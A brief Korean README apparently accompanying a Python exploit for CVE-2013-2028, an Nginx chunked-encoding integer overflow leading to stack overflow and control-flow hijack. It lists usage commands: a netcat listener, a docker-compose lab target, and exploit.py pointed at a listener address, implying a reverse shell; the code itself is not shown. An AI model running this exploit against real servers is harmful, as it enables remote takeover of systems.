
CVE-2013-2028 python exploit
취약한 소프트웨어: Nginx 1.3.9 < 1.4.0
수정 커밋: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
취약점은 ngx_http_parse_chunked 함수에 존재합니다. 이 익스플로잇은 ngx_http_parse_chunked에서 정수 오버플로우를 발생시키고, 이후 이를 사용하여 스택을 오버플로우시켜 제어 흐름을 탈취합니다.
실제 익스플로잇은 4단계로 구성됩니다:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <리스너 머신 주소> -lp <리스너 머신 포트>